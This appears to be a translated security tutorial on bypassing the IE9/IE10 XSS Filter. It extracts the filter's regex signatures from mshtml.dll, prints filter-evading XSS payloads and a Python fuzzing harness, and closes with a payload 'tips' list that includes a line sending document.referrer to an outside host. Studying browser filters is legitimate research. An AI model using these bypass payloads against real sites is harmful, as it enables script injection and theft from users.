0x00 background
Microsoft added the XSS Filter in IE8 Beta 2. Like most security products, it protects by applying rules (regular-expression signatures) to filter attack code out of requests; on top of that, for availability and efficiency, it combines a blacklist (the signatures) with a whitelist policy (same-origin requests are not filtered).
After several generations of updates, and testing by a large number of hacking enthusiasts (Microsoft is good at attracting outside talent to find vulnerabilities), IE9's filter is considerably stronger. What follows mainly targets IE9 and IE10.
0x01 Find the root cause
How the IE XSS Filter works
Its processing flow
There are many stages at which a bypass can be verified, for example the problems 80sec found:
http://www.80sec.com/ie8-security-alert.html
Let's start by expanding on bypassing the XSS Filter itself.
Many people keep a good collection of payload characters and snippets and combine them as needed. What follows is for readers like me who cannot hold all of that in their head: you need to know the actual regular expressions used by IE's XSS Filter.
0x02 Extract the regular expressions
Here are several ways to find the IE XSS Filter regular expressions. (They live in mshtml.dll, the module that implements the Trident rendering engine.)
You can open mshtml.dll in hexadecimal view with Notepad++ (TextFX plugin) and search for 'sc{' to find them.
Or use WinHex (the author's favourite tool) and search for the same string.
However, I strongly recommend getting familiar with IDA Pro (it will serve you well when you later study other targets such as WebKit or Android).
A console command from a foreign blog is very practical:
findstr /C:"sc{r}" \WINDOWS\SYSTEM32\mshtml.dll|find "{"
Here is the IE9 XSS Filter regex dump (2013/2):
{(v|(&[#()\[\].]x?0*((86)|(56)|(118)|(76));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(b|(&[#()\[\].]x?0*((66)|(42)|(98)|(62));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(s|(&[#()\[\].]x?0*((83)|(53)|(115)|(73));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(c|(&[#()\[\].]x?0*((67)|(43)|(99)|(63));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*{(r|(&[#()\[\].]x?0*((82)|(52)|(114)|(72));?))}([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(i|(&[#()\[\].]x?0*((73)|(49)|(105)|(69));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(p|(&[#()\[\].]x?0*((80)|(50)|(112)|(70));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(t|(&[#()\[\].]x?0*((84)|(54)|(116)|(74));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(:|(&[#()\[\].]x?0*((58)|(3A));?)).}{(j|(&[#()\[\].]x?0*((74)|(4A)|(106)|(6A));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(a|(&[#()\[\].]x?0*((65)|(41)|(97)|(61));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(v|(&[#()\[\].]x?0*((86)|(56)|(118)|(76));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(a|(&[#()\[\].]x?0*((65)|(41)|(97)|(61));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(s|(&[#()\[\].]x?0*((83)|(53)|(115)|(73));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(c|(&[#()\[\].]x?0*((67)|(43)|(99)|(63));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*{(r|(&[#()\[\].]x?0*((82)|(52)|(114)|(72));?))}([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(i|(&[#()\[\].]x?0*((73)|(49)|(105)|(69));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(p|(&[#()\[\].]x?0*((80)|(50)|(112)|(70));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(t|(&[#()\[\].]x?0*((84)|(54)|(116)|(74));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(:|(&[#()\[\].]x?0*((58)|(3A));?)).}{<st{y}le.*?>.*?((@[i\\])|(([:=]|(&[#()\[\].]x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&[#()\[\].]x?0*((40)|(28)|(92)|(5C));?))))}{[ /+\t\"\'`]st{y}le[ /+\t]*?=.*?([:=]|(&[#()\[\].]x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&[#()\[\].]x?0*((40)|(28)|(92)|(5C));?))}{<OB{J}ECT[ /+\t].*?((type)|(codetype)|(classid)|(code)|(data))[ /+\t]*=}{<AP{P}LET[ /+\t].*?code[ /+\t]*=}{[ /+\t\"\'`]data{s}rc[ +\t]*?=.}{<BA{S}E[ /+\t].*?href[ /+\t]*=}{<LI{N}K[ /+\t].*?href[ /+\t]*=}{<ME{T}A[ /+\t].*?http-equiv[ /+\t]*=}{<[?]?im{p}ort[ /+\t].*?implementation[ /+\t]*=}{<EM{B}ED[ /+\t].*?((src)|(type)).*?=}{[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.}{<.*[:]vmlf{r}ame.*?[ /+\t]*?src[ /+\t]*=}{<[i]?f{r}ame.*?[ /+\t]*?src[ /+\t]*=}{<is{i}ndex[ /+\t>]}{<fo{r}m.*?>}{<sc{r}ipt.*?[ /+\t]*?src[ /+\t]*=}{<sc{r}ipt.*?>}{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).*?(((l|(\\u006C))(o|(\\u006F))({c}|(\\u00{6}3))(a|(\\u0061))(t|(\\u0074))(i|(\\u0069))(o|(\\u006F))(n|(\\u006E)))|((n|(\\u006E))(a|(\\u0061))({m}|(\\u00{6}D))(e|(\\u0065)))).*?=}{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{[\[]}.*?{[\]]}.*?=}{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{[.]}.+?=}{[\"\'].*?{\)}[ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}}{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}.*?{\)}}
And the IE10 regex dump (2013/5):
{<sc{r}ipt.*?>}{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).*?(((l|(\\u006[Cc]))(o|(\\u006[Ff]))({c}|(\\u00{6}3))(a|(\\u0061))(t|(\\u0074))(i|(\\u0069))(o|(\\u006[Ff]))(n|(\\u006[Ee])))|((n|(\\u006[Ee]))(a|(\\u0061))({m}|(\\u00{6}[Dd]))(e|(\\u0065)))|((o|(\\u006[Ff]))(n|(\\u006[Ee]))({e}|(\\u00{6}5))(r|(\\u0072))(r|(\\u0072))(o|(\\u006[Ff]))(r|(\\u0072)))|((v|(\\u0076))(a|(\\u0061))({l}|(\\u00{6}[Cc]))(u|(\\u0075))(e|(\\u0065))(O|(\\u004[Ff]))(f|(\\u0066)))).*?=}{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{[\[]}.*?{[\]]}.*?=}{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{[.]}.+?=}{[\"\'].*?{\)}[ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}}{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}.*?{\)}}{[\"\'].*?[{,].*(((v|(\\u0076)|(\\166)|(\\x76))[^a-z0-9]*({a}|(\\u00{6}1)|(\\1{4}1)|(\\x{6}1))[^a-z0-9]*(l|(\\u006C)|(\\154)|(\\x6C))[^a-z0-9]*(u|(\\u0075)|(\\165)|(\\x75))[^a-z0-9]*(e|(\\u0065)|(\\145)|(\\x65))[^a-z0-9]*(O|(\\u004F)|(\\117)|(\\x4F))[^a-z0-9]*(f|(\\u0066)|(\\146)|(\\x66)))|((t|(\\u0074)|(\\164)|(\\x74))[^a-z0-9]*({o}|(\\u00{6}F)|(\\1{5}7)|(\\x{6}F))[^a-z0-9]*(S|(\\u0053)|(\\123)|(\\x53))[^a-z0-9]*(t|(\\u0074)|(\\164)|(\\x74))[^a-z0-9]*(r|(\\u0072)|(\\162)|(\\x72))[^a-z0-9]*(i|(\\u0069)|(\\151)|(\\x69))[^a-z0-9]*(n|(\\u006E)|(\\156)|(\\x6E))[^a-z0-9]*(g|(\\u0067)|(\\147)|(\\x67)))).*?:}{<AP{P}LET[ /+\t>]}{<OB{J}ECT[ /+\t].*?((type)|(codetype)|(classid)|(code)|(data))[ /+\t]*=}{<BA{S}E[ /+\t].*?href[ /+\t]*=}{[ /+\t\"\'`]data{s}rc[ +\t]*?=.}{<LI{N}K[ /+\t].*?href[ /+\t]*=}{<[?]?im{p}ort[ /+\t].*?implementation[ /+\t]*=}{<ME{T}A[ /+\t].*?http-equiv[ /+\t]*=}{[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.}{<EM{B}ED[ /+\t].*?((src)|(type)).*?=}{<.*[:]vmlf{r}ame.*?[ /+\t]*?src[ /+\t]*=}{<is{i}ndex[ /+\t>]}{<[i]?f{r}ame.*?[ /+\t]*?src[ /+\t]*=}{<sc{r}ipt.*?[ /+\t]*?src[ /+\t]*=}{<fo{r}m.*?>}{(v|(&#x?0*((86)|(56)|(118)|(76));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(b|(&#x?0*((66)|(42)|(98)|(62));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(s|(&#x?0*((83)|(53)|(115)|(73));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(c|(&#x?0*((67)|(43)|(99)|(63));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*{(r|(&#x?0*((82)|(52)|(114)|(72));?))}([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(i|(&#x?0*((73)|(49)|(105)|(69));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(&#x?0*((80)|(50)|(112)|(70));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(t|(&#x?0*((84)|(54)|(116)|(74));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(:|(&((#x?0*((58)|(3A));?)|(colon;)))).}{(j|(&#x?0*((74)|(4A)|(106)|(6A));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&#x?0*((65)|(41)|(97)|(61));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(v|(&#x?0*((86)|(56)|(118)|(76));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&#x?0*((65)|(41)|(97)|(61));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(s|(&#x?0*((83)|(53)|(115)|(73));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(c|(&#x?0*((67)|(43)|(99)|(63));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*{(r|(&#x?0*((82)|(52)|(114)|(72));?))}([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(i|(&#x?0*((73)|(49)|(105)|(69));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(&#x?0*((80)|(50)|(112)|(70));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(t|(&#x?0*((84)|(54)|(116)|(74));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(:|(&((#x?0*((58)|(3A));?)|(colon;)))).}{<st{y}le.*?>.*?((@[i\\])|(([:=]|(&#x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&#x?0*((40)|(28)|(92)|(5C));?))))}{[ /+\t\"\'`]st{y}le[ /+\t]*?=.*?([:=]|(&#x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&#x?0*((40)|(28)|(92)|(5C));?))}
Comparing the two dumps, IE10 has updated a good number of signatures relative to IE9: the location/name signature now also covers onerror and valueOf, a new signature looks for valueOf/toString (also in \u, octal and \x escaped forms) after a quote and a brace or comma, and the vbscript:/javascript: signatures now also recognise the &tab; &newline; and &colon; entities.
The syntax also shows that IE's regular expressions are ATL-style (CAtlRegExp): {...} is a group, and the character captured by it is the one the filter replaces with # when a signature fires (<sc{r}ipt becomes <sc#ipt), while \c matches one alphanumeric character. WebKit uses JSCRE (derived from PCRE); Chrome also used JSCRE early on and switched to Irregexp in 2009.
With the regular expressions in hand we can test bypass statements.
Take IE9 as an example. Regex1 (the old location signature):
[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).*?(location).*?=
Bypass:
"+{valueOf:location,toString:[].join,0:'jav\x61script:alert\x280)',length:1}//
The signature requires an = somewhere after location, and the payload contains none. It works because in IE location is callable as a function (location("http://xss.me/") navigates), so making it the object's valueOf is enough.
Another example is IE's multi-parameter bypass, where the payload is split across two query parameters:
param1=<script>prompt(9);/*&param2=*/</script>
Recently a 32-character bypass on account.google.com was posted at http://zone.wooyun.org/content/4448.
An interesting aside: the Japanese seem to like Unicode encoding. I once saw a very neat Unicode trick (\u1d2e\u1d35\u1d33\u1d2e\u1d35\u1d3f\u1d30, modifier letters that normalise to BIGBIRD) used to reset the BIGBIRD user's password.
Americans prefer this kind of syntax deformation:
<script/src="data:text/javascript,o={window:'/XSS/'};prompt(o['window']);"></script>
Lao Mao prefers all kinds of special characters. (These are just personal impressions.)
0x03 Fuzz
Observing the browser by hand is not an efficient way to test bypasses, so turn the work into a script.
When I first switched to Python I realised that Python's re module speaks Perl-style (PCRE-like) syntax, not ATL's, so the IE signatures cannot be fed to it as they are. (Fortunately the WebKit filter is PCRE-based; the next article will cover WebKit.)
So the fuzzer was written in C++ instead, which can use the ATL regex class directly.
Usage: IEfilter.txt holds the IE regular expressions and Bypasstest.txt holds the bypass statements; the program writes the results to a file and to the console.
Download link: http://pan.baidu.com/share/link?shareid=1243023532&uk=1259968226
You can generate the contents of Bypasstest.txt yourself; if you have used SPIKE before, you can borrow its payloads and approach directly.
Some ideas for generating payloads:
1. Special characters: 0x09, 0x0A-0x0D, 0x20, 0xA0
2. Different encodings: \xc2\xb4, \xe2\x80\x99, \xe2\x80 and even malformed encodings
3. Uncommon functions
4. Boundary variables
The rest is left for you to study.
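The harness below is an added example, not code from the original post or its C++ fuzzer. It does in Python what the paragraph above says could not be done directly: it translates IE's ATL-syntax signatures (the {...} neutering groups and the \c class) into Python re syntax, then runs the payloads quoted in 0x02 against them and reports which signature fires and what the neutered text would look like. The signatures are copied from the IE9/IE10 dumps above with their outer braces removed; the payloads are the ones from the post. Three things are assumptions rather than facts taken from the page: that IE matches case-insensitively (the dump mixes OB{J}ECT and sc{r}ipt), that ATL's "." also matches a newline, and that for a signature with several {...} groups IE replaces every group that took part in the match (the single-group case, <sc#ipt>, is the documented behaviour).

```python
import re

# ATL (CAtlRegExp) escapes that Python's re either lacks or reads differently.
ATL_CLASSES = {"c": "[A-Za-z0-9]", "a": "[A-Za-z]", "h": "[0-9A-Fa-f]", "d": "[0-9]"}


def split_signatures(blob):
    """Split a '{sig1}{sig2}...' dump (as printed by findstr) into signatures.

    Braces inside a character class ('[{,]') or escaped ('\\{') do not count,
    and nested {...} groups stay inside their signature.
    """
    sigs, depth, start, in_class, i = [], 0, 0, False, 0
    while i < len(blob):
        ch = blob[i]
        if ch == "\\":                  # skip the escaped character
            i += 2
            continue
        if in_class:
            in_class = ch != "]"
        elif ch == "[":
            in_class = True
        elif ch == "{":
            if depth == 0:
                start = i + 1
            depth += 1
        elif ch == "}":
            depth -= 1
            if depth == 0:
                sigs.append(blob[start:i])
        i += 1
    return sigs


def atl_to_python(sig):
    """Translate one ATL signature to Python re syntax.

    Returns (pattern, names): every ATL {...} group becomes a named group so the
    character IE would neuter can be located after a match.
    """
    out, names, in_class, i = [], [], False, 0
    while i < len(sig):
        ch = sig[i]
        if ch == "\\" and i + 1 < len(sig):
            nxt = sig[i + 1]
            if not in_class and nxt in ATL_CLASSES:
                out.append(ATL_CLASSES[nxt])
            else:
                out.append(ch + nxt)    # every other escape means the same in re
            i += 2
            continue
        if in_class:
            in_class = ch != "]"
            out.append(ch)
        elif ch == "[":
            in_class = True
            out.append(ch)
        elif ch == "{":
            name = "atl%d" % len(names)
            names.append(name)
            out.append("(?P<%s>" % name)
        elif ch == "}":
            out.append(")")
        else:
            out.append(ch)
        i += 1
    return "".join(out), names


def compile_signatures(sigs):
    # Assumptions about the IE engine: case-insensitive, and '.' matches newlines.
    compiled = []
    for sig in sigs:
        pattern, names = atl_to_python(sig)
        compiled.append((sig, re.compile(pattern, re.IGNORECASE | re.DOTALL), names))
    return compiled


def scan(payload, compiled):
    """Return [(signature, neutered_payload)] for every signature that fires."""
    hits = []
    for sig, rx, names in compiled:
        m = rx.search(payload)
        if m is None:
            continue
        chars = list(payload)
        for name in names:              # assumption: every participating {...} group is neutered
            if m.group(name) is not None:
                s, e = m.span(name)
                chars[s:e] = "#" * (e - s)
        hits.append((sig, "".join(chars)))
    return hits


# Signatures copied from the dumps above (outer braces removed): IE9 <script> and on*
# handler, the old location signature quoted in 0x02, and the IE10 valueOf/toString one.
SIGNATURES = [
    r"<sc{r}ipt.*?>",
    r"[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.",
    r"[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).*?(location).*?=",
    r"[\"\'].*?[{,].*(((v|(\\u0076)|(\\166)|(\\x76))[^a-z0-9]*({a}|(\\u00{6}1)|(\\1{4}1)|(\\x{6}1))[^a-z0-9]*(l|(\\u006C)|(\\154)|(\\x6C))[^a-z0-9]*(u|(\\u0075)|(\\165)|(\\x75))[^a-z0-9]*(e|(\\u0065)|(\\145)|(\\x65))[^a-z0-9]*(O|(\\u004F)|(\\117)|(\\x4F))[^a-z0-9]*(f|(\\u0066)|(\\146)|(\\x66)))|((t|(\\u0074)|(\\164)|(\\x74))[^a-z0-9]*({o}|(\\u00{6}F)|(\\1{5}7)|(\\x{6}F))[^a-z0-9]*(S|(\\u0053)|(\\123)|(\\x53))[^a-z0-9]*(t|(\\u0074)|(\\164)|(\\x74))[^a-z0-9]*(r|(\\u0072)|(\\162)|(\\x72))[^a-z0-9]*(i|(\\u0069)|(\\151)|(\\x69))[^a-z0-9]*(n|(\\u006E)|(\\156)|(\\x6E))[^a-z0-9]*(g|(\\u0067)|(\\147)|(\\x67)))).*?:",
]

# Constructed payload list: the ones quoted in the post plus a plain event handler.
PAYLOADS = [
    "<script>prompt(9)</script>",
    '<body/onload="alert(1)">',
    r'''"+{valueOf:location,toString:[].join,0:'jav\x61script:alert\x280)',length:1}//''',
]


def fuzz(payloads=PAYLOADS, sigs=SIGNATURES):
    """Map each payload to the signatures it trips; an empty list means a bypass."""
    compiled = compile_signatures(sigs)
    return {p: scan(p, compiled) for p in payloads}


if __name__ == "__main__":
    for payload, hits in fuzz().items():
        print(payload)
        for sig, neutered in hits:
            print("  hit  %-40.40s -> %s" % (sig, neutered))
        if not hits:
            print("  BYPASS (no signature fired)")
```

To use the full dump, read IEfilter.txt into one string (join the lines first, since the dumps above were broken across lines by the page), pass it through split_signatures(), and feed the result to fuzz() together with your Bypasstest.txt lines. Against the three signatures from IE9 the valueOf/location payload trips nothing, which is the bypass quoted in 0x02; only the IE10 valueOf/toString signature catches it.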
0x04 Sharing a few things
Feel free to get in touch with me, or to write articles of your own (keep levelling up!).
Tips from abroad (pay more attention to foreign technical blogs and forums):
Tip1: var url="http://xss.cx/default.aspx?xss="+encodeURIComponent(document.referrer);if(window!=top){top.location.href=url;}else document.location=url;
Tip2: <script/src="data:text/javascript,o={window:'/XSS/'};prompt(o['window']);"></script>
Tip3: <body/onload="@set @edevil=1;@if(@edevil)eval(confirm(@edevil))@end;">
Tip4: "><script>alert(document.location)</script> (webkit)
Tip5: "-prompt(document.location)-" (webkit)
Tip6: Referer: http://www.google.com/search?hl=en&q=xss"><script>prompt(9)</script> (webkit)
Tip7: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) xss"><script>prompt(9)</script> (webkit; only just looked into this one)
References:
http://blogs.technet.com/b/srd/archive/2008/08/19/ie-8-xss-filter-architecture-implementation.aspx
http://www.80sec.com